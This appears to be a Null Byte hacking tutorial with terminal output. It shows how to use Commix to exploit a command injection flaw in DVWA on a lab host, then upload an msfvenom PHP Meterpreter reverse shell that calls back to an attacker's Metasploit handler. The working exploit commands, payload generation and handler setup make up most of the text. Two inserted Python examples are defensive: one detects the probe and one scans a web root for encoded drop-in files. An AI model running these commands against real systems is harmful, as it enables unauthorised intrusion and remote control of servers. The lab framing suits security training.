How to Use Commix to Automate Exploiting Command Injection Flaws in Web Applications
In the terminal, we can now type commix -h to view the help with all the different options this tool has to offer.
root@drd:~# commix -h
Usage: commix [option(s)]
-h, --help Show help and exit.
These options relate to general matters.
-v VERBOSE Verbosity level (0-4, Default: 0).
--version Show version number and exit.
--output-dir=OUT.. Set custom output directory path.
-s SESSION_FILE Load session from a stored (.sqlite) file.
--flush-session Flush session files for current target.
--ignore-session Ignore results stored in session file.
-t TRAFFIC_FILE Log all HTTP traffic into a textual file.
--batch Never ask for user input, use the default behaviour.
--encoding=ENCOD.. Force character encoding used for data retrieval (e.g.
--charset=CHARSET Time-related injection charset (e.g.
--check-internet Check internet connection before assessing the target.
These options have to be provided to define the target URL.
-u URL, --url=URL Target URL.
--url-reload Reload target URL after command execution.
-l LOGFILE Parse target from HTTP proxy log file.
-m BULKFILE Scan multiple targets given in a textual file.
-r REQUESTFILE Load HTTP request from a file.
--crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2,
-x SITEMAP_URL Parse target(s) from remote sitemap (.xml) file.
These options can be used to specify how to connect to the target URL.
-d DATA, --data=.. Data string to be sent through POST.
--host=HOST HTTP Host header.
--referer=REFERER HTTP Referer header.
--user-agent=AGENT HTTP User-Agent header.
--random-agent Use a randomly selected HTTP User-Agent header.
--param-del=PDEL Set character for splitting parameter values.
--cookie=COOKIE HTTP Cookie header.
--cookie-del=CDEL Set character for splitting cookie values.
-H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').
--headers=HEADERS Extra headers (e.g. 'Accept-Language: fr\nETag: 123').
--proxy=PROXY Use an HTTP proxy (e.g. '127.0.0.1:8080').
--tor Use the Tor network.
--tor-port=TOR_P.. Set Tor proxy port (Default: 8118).
--tor-check Check to see if Tor is used properly.
--auth-url=AUTH_.. Login panel URL.
--auth-data=AUTH.. Login parameters and data.
--auth-type=AUTH.. HTTP authentication type (e.g. 'Basic' or 'Digest').
--auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin').
--ignore-401 Ignore HTTP error 401 (Unauthorized).
--force-ssl Force usage of SSL/HTTPS.
--ignore-redirects Ignore redirection attempts.
--retries=RETRIES Retries when the connection times out (Default: 3).
We use the following options: -u to define the target URL, --cookie= to set the appropriate cookie information, and --data= to supply the POST request string.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low' --data='ip=127.0.0.1&submit=submit'
The tool launches and displays a banner with version information, followed by a series of status messages. We can see that it finds a parameter vulnerable to command injection and asks us whether we want a Pseudo-Terminal shell.
[Commix ASCII-art banner] v2.6-stable http://commixproject.com (@commixproject)
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2018 Anastasios Stasinopoulos (@ancst)
[*] Checking connection to the target URL... [ SUCCEED ]
[!] Warning: Heuristics have failed to identify target application.
[*] Setting the POST parameter 'ip' for tests.
[!] Warning: The estimated response time is 10 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
[+] The POST parameter 'ip' seems injectable via (results-based) classic command injection technique.
[~] Payload: ;echo OOIVXD$((89+59))$(echo OOIVXD)OOIVXD
[?] Do you want a Pseudo-Terminal shell? [Y/n] >
If we press Y, it drops us into an interactive command shell. We can now issue commands such as whoami and uname -a to display information about the server.
Pseudo-Terminal (type '?' for available options)
commix(os_shell) > whoami
www-data
commix(os_shell) > uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
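The "[~] Payload:" line above shows how Commix confirms the injection: it chains an echo with shell arithmetic onto the parameter and looks for the evaluated result in the reply. The following is an added example (not part of the original guide or the Commix project) that recognises that probe in a form-encoded POST body and derives the marker a vulnerable host would echo back, so a detection engineer can pair request and response; the sample body is constructed, not captured traffic.

```python
"""Recognise the results-based probe Commix sends and derive the marker a
vulnerable target echoes back. Added example, not from the original guide;
the POST body below is constructed, not captured traffic."""
import re
from urllib.parse import unquote_plus

# Commix proves execution with shell arithmetic: ";echo TAG$((A+B))$(echo TAG)TAG".
# Only a shell that actually ran the command returns "TAG<A+B>TAGTAG"; an app that
# merely reflects its input returns the literal "$((A+B))" instead.
PROBE = re.compile(r";\s*echo\s+([A-Z0-9]{6})\$\(\((\d+)\+(\d+)\)\)\$\(echo\s+\1\)\1")

def expected_marker(tag: str, a: int, b: int) -> str:
    """The string a vulnerable target prints for this probe."""
    return f"{tag}{a + b}{tag}{tag}"

def find_probe(value: str):
    """Return (tag, expected marker) if the parameter value carries a probe."""
    m = PROBE.search(value)
    if not m:
        return None
    tag, a, b = m.group(1), int(m.group(2)), int(m.group(3))
    return tag, expected_marker(tag, a, b)

def scan_post_body(body: str) -> list:
    """Check each parameter of a form-encoded POST body (split on '&' only, so a
    ';' inside a value is not mistaken for a separator); returns findings."""
    findings = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        hit = find_probe(unquote_plus(raw))
        if hit:
            findings.append((unquote_plus(name), hit[0], hit[1]))
    return findings

def response_confirms(response_body: str, marker: str) -> bool:
    """True when the reply contains the computed marker, i.e. the shell evaluated
    the arithmetic. Matching this request/response pair in a WAF or log pipeline
    confirms a live injection rather than a mere reflection of the input."""
    return marker in response_body

# Constructed sample: DVWA's 'ip' parameter carrying the page's probe, form-encoded.
SAMPLE_BODY = ("ip=127.0.0.1%3Becho+OOIVXD%24%28%2889%2B59%29%29%24%28echo+OOIVXD%29OOIVXD"
               "&submit=submit")

if __name__ == "__main__":
    for name, tag, marker in scan_post_body(SAMPLE_BODY):
        print(f"probe in parameter {name!r}: tag {tag}, expect {marker!r} in response")
```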
This is really useful, but we are a bit limited in what we can do. Fortunately, there is a way to combine Commix's functionality with the powerful msfvenom to ultimately get a Meterpreter session on the target.
Method 2: Upload a Reverse Shell
Commix has a feature that allows us to write files to the target system. We will place a reverse shell on the target which will call back to our attacking machine, but before we do, we need to create a payload.
Msfvenom is a payload generator that replaced both msfpayload and msfencode back in 2015. This single tool can be used to generate payloads when working outside the Metasploit Framework.
Use the msfvenom command with the following options: -p to specify the payload, lhost and lport to set the listener's host address and port, -e to specify the encoder, and -f to specify the output format. Be sure to use > to redirect the output into the file payload.php.
root@drd:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.1.100 lport=4321 -e php/base64 -f raw > payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1507 (iteration=0)
php/base64 chosen with final size 1507
Payload size: 1507 bytes
We see that the payload was created. Now we just need to add the PHP tags to our file. Type nano payload.php, add <?php at the beginning of the file and ?> at the end of the file, then press Ctrl-X, Y, and Enter to save.
Now we need to open a handler on our machine to catch the session that opens on the target. In a new terminal window, start Metasploit by typing msfconsole. Then type use exploit/multi/handler to select the generic handler.
Then enter payload, listening address and port as we entered in our file earlier.
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 172.16.1.100
lhost => 172.16.1.100
msf exploit(multi/handler) > set lport 4321
lport => 4321
Once these are set, start the handler by typing run, an alias for exploit.
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.1.100:4321
Back in our second terminal, we can run Commix just like we did before, with a few extra options to get our payload onto the target: --file-write to specify the file we want to upload from our local machine, --file-dest to set the destination path on the target, and --os-cmd to specify the command to run once the file has been written.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low' --data='ip=127.0.0.1&submit=submit' --file-write='/root/payload.php' --file-dest='/var/www/payload.php' --os-cmd='php -f /var/www/payload.php'
This causes our payload to execute, and if everything works properly, a session is caught by our handler. Commix will run for a bit, and eventually we can see that our file was successfully created on the target.
[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
[+] The POST parameter 'ip' seems injectable via (results-based) classic command injection technique.
[~] Payload: ;echo YJOSPV$((42+12))$(echo YJOSPV)YJOSPV
[+] The file /var/www/payload.php was successfully created!
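The file written in this step is a php/base64-encoded stage dropped into the web root, and Metasploit's php/base64 encoder wraps its output in an eval(base64_decode(...)) stub. The following is an added example (not part of the original guide or the Metasploit project) of a host-side check a defender can run over a web root to flag such drop-in files; the sample web root is constructed in a temporary directory, and the assumption that legitimate pages never evaluate base64-decoded strings is labelled in the code.

```python
"""Flag PHP files in a web root that look like an encoded, dropped-in payload of
the kind Method 2 writes to /var/www/payload.php. Added example, not from the
original guide; the sample files are constructed in a temporary directory."""
import os
import re
import tempfile
import time
from pathlib import Path

# Metasploit's php/base64 encoder emits eval(base64_decode(...)).
# Assumption: the site's own pages never evaluate base64-decoded strings.
SUSPICIOUS = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

def scan_webroot(root: str, newer_than_seconds: float = 86400.0) -> list:
    """Return (relative path, reasons) for every .php file that contains an
    eval(base64_decode(...)) stub or was modified within the given window.
    The mtime check is a triage hint only: an intruder can reset timestamps."""
    now = time.time()
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        reasons = []
        if SUSPICIOUS.search(path.read_text(errors="replace")):
            reasons.append("eval(base64_decode()) stub")
        if now - path.stat().st_mtime < newer_than_seconds:
            reasons.append("recently written")
        if reasons:
            findings.append((str(path.relative_to(root)), reasons))
    return findings

def build_sample_webroot(root: str) -> None:
    """Constructed sample: one ordinary page and one encoded drop-in file."""
    Path(root, "index.php").write_text("<?php echo 'hello'; ?>\n")
    Path(root, "payload.php").write_text(
        "<?php eval(base64_decode('LyogY29uc3RydWN0ZWQgKi8=')); ?>\n"
    )
    # Age index.php so that only the drop-in counts as recently written.
    old = time.time() - 30 * 86400
    os.utime(Path(root, "index.php"), (old, old))

def demo() -> list:
    """Build the sample web root in a temp dir and return the scan findings."""
    root = tempfile.mkdtemp(prefix="webroot-")
    build_sample_webroot(root)
    return scan_webroot(root)

if __name__ == "__main__":
    for rel_path, reasons in demo():
        print(f"{rel_path}: {', '.join(reasons)}")
```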
Now, back in the terminal running our handler, we can see that a Meterpreter session was indeed opened. We can now run commands like getuid and sysinfo to display information about the target.
[*] Sending stage (37775 bytes) to 172.16.1.102
[*] Meterpreter session 1 opened (172.16.1.100:4321 -> 172.16.1.102:40115) at 2018-10-18 11:29:19 -0500
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
OS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux
These are similar results to what we got earlier using Commix on its own, but now that we have a Meterpreter session, there is much more flexibility in what we can ultimately do.
Conclusion
Command injection vulnerabilities are sought after by hackers because of the power they grant over the target system. Commix is an extremely useful tool designed to automate finding and exploiting these vulnerabilities, making life a little easier for the hacker.
In this guide, we learned some basic usage options. In addition, we saw how to combine msfvenom with Commix to upload a payload to the target and get a shell. This flexibility makes Commix an excellent complement to any
Cover image by jarmoluk/Pixabay; screenshots by drd_/Null Byte